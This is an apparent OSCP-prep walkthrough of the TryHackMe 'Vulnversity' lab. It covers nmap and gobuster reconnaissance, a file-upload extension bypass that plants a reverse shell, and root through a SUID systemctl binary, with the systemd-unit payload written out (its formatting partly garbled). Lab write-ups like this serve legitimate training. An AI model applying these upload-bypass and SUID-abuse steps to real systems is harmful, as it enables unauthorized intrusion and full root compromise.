Vulnversity Walkthrough - OSCP Preparation


This is our first room on TryHackMe and we’re gonna follow along with the OSCP preparation series. Let’s get started with our first machine.

Specifications

Room: Vulnversity
Target OS: Linux
Difficulty: Easy
Info: Learn about active recon, web app attacks and privilege escalation.
Services: SSH (22), FTP (21), SMB (139, 445), Squid (3128), HTTP (3333)

Contents

• Getting user
• Getting root

Reconnaissance

As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA nmap 10.10.71.169

Output

21/tcp   open  ftp         vsftpd 3.0.3                                                                                                                    
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)                                                                    
| ssh-hostkey:                                                                                                                                             
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)                                                                                             
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)                                                                                            
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumerating Port 3333

If we browse IP:3333 we’ll see and index page

GoBuster

gobuster -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.71.169:3333/ -s '200,204,301,307,403,500' 2>/dev/null

Exploitation

We found an interesting directory /internal upon browsing it we got an upload file field.

Checking Source Code

We have to bypass the extension to upload our shell.

In this case the wordlist we’re gonna use /SecLists/Discovery/Web-Content/web-extensions.txt

We have to disable the URL-encoding.

And Start the Attack.

We got our extension and our shell is successfully uploaded.

shell uploaded

Let’s start our listener and we get our shell.

The user flag can be found in /home/bill/user.txt directory.

Privilege Escalation

Now that we have remote access to our target let’s escalate our privilege to root. Generally, everyone has there own mythology of going after privilege escalation. What I try to do is run privilege escalation scripts which can give me a general idea of vulnerabilities, processes and bad permissions and etc.

Let’s find SUID executable files

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

There are so many files but if you understand the structure and if you look for odd files here and those files that are recently modified or created you put those files on your radar.

In that case, we have /bin/systemctl SUID binary.

systemctl is a binary that controls interfaces for init systems and service managers. Remember making your services run using the systemctl command during the boot time. All those tasks are handled as units and are defined in unit folders. By default systemctl will search these files in /etc/system/systemd

First, we create an environment variable that holds a unique file.

eop=$(mktemp).service echo '[Service] > ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" > [Install] > WantedBy=multi-user.target' > $eop /bin/systemctl link $eop

/bin/systemctl enable --now $eop


If that worked we can see the output file which includes the root flag.


1 Like